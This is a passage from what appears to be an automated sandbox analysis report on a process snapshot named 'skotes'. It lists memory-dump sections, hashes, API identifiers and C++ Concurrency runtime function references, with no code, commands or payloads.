                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error
                                                                                                                                                                                                                                                  • String ID: RoInitialize$RoUninitialize$combase.dll
                                                                                                                                                                                                                                                  • API String ID: 348560076-3997890769
                                                                                                                                                                                                                                                  • Opcode ID: 1cea4ff0453ef2d46a63054d9e65829d8f71bbd9523edd580e9693551392b113
                                                                                                                                                                                                                                                  • Instruction ID: 3848bea56413c7b0cfc1bade7bfa33713e5f559e3cdc3c172e42eb52c14b929c
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1cea4ff0453ef2d46a63054d9e65829d8f71bbd9523edd580e9693551392b113
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2401C46469271159DF10B7766D09FAB39DCDF02304F20683FA541E6292EF6DD40046AD
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • SafeRWList.LIBCONCRT ref: 00496E73
                                                                                                                                                                                                                                                    • Part of subcall function 00494E6E: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00494E7F
                                                                                                                                                                                                                                                    • Part of subcall function 00494E6E: List.LIBCMT ref: 00494E89
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00496E85
                                                                                                                                                                                                                                                  • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 00496EAA
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: eventObject
                                                                                                                                                                                                                                                  • API String ID: 1288476792-1680012138
                                                                                                                                                                                                                                                  • Opcode ID: 5e03ec0491f81ab7c7ba08e5c6a48c2e6c1d74f290cc4e8a4740207c90a430c7
                                                                                                                                                                                                                                                  • Instruction ID: 4ebb7e4129d97b655ac3274f30bf9e2a1456a2292ef8681543137edd2c4b8bf9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5e03ec0491f81ab7c7ba08e5c6a48c2e6c1d74f290cc4e8a4740207c90a430c7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2B11C279950204E6DF24EBA5CC8AFEF7B685F01744F30452BB508A61D1EB789A04C67D
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0049A102
                                                                                                                                                                                                                                                  • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0049A126
                                                                                                                                                                                                                                                  • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0049A139
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                  • String ID: pScheduler
                                                                                                                                                                                                                                                  • API String ID: 246774199-923244539
                                                                                                                                                                                                                                                  • Opcode ID: 8012a900497c1d51e88d1c9b8b485d2d8fbfed186917343eb0b788b715272b5b
                                                                                                                                                                                                                                                  • Instruction ID: 136281b119a4c1ae043ce9ccce8ab628ea860dbce1820f435962d0ef0550fcd6
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8012a900497c1d51e88d1c9b8b485d2d8fbfed186917343eb0b788b715272b5b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5AF05036900104A7CF10FE95DC93D9EBB789E81718B20813FE40513242DF7CAA05C6EE
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.4624259952.0000000000471000.00000040.00000001.01000000.00000007.sdmp, Offset: 00470000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624147168.0000000000470000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624259952.00000000004D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624511254.00000000004D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624594687.00000000004DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4624789259.00000000004E7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626878493.0000000000644000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4626956652.0000000000646000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627111618.0000000000660000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627215025.0000000000662000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.0000000000664000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627263512.000000000066D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627520705.0000000000671000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627621521.0000000000672000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4627795067.0000000000673000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628081596.0000000000674000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628191632.0000000000675000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628280582.0000000000677000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628504116.0000000000687000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628612592.0000000000688000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4628688890.0000000000690000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4629741634.0000000000691000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4630340866.000000000069B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4631260053.00000000006B0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632026108.00000000006B1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632624441.00000000006B3000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632738173.00000000006CE000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632893651.00000000006D0000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4632946339.00000000006D7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633135207.00000000006D9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633271692.00000000006DA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633339364.00000000006DE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4633438688.00000000006DF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4634528753.00000000006E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4635382014.00000000006EC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4636770932.00000000006ED000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4638489368.00000000006F5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4639417984.00000000006F9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4640384962.000000000070B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4642083004.000000000070D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4644899265.0000000000723000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000729000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646300218.0000000000748000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646671040.0000000000775000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646742452.0000000000776000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646878563.0000000000777000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4646993632.000000000077D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647248792.000000000077F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4647997205.000000000078D000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000009.00000002.4650697073.000000000078F000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_470000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: __alloca_probe_16__freea
                                                                                                                                                                                                                                                  • String ID:
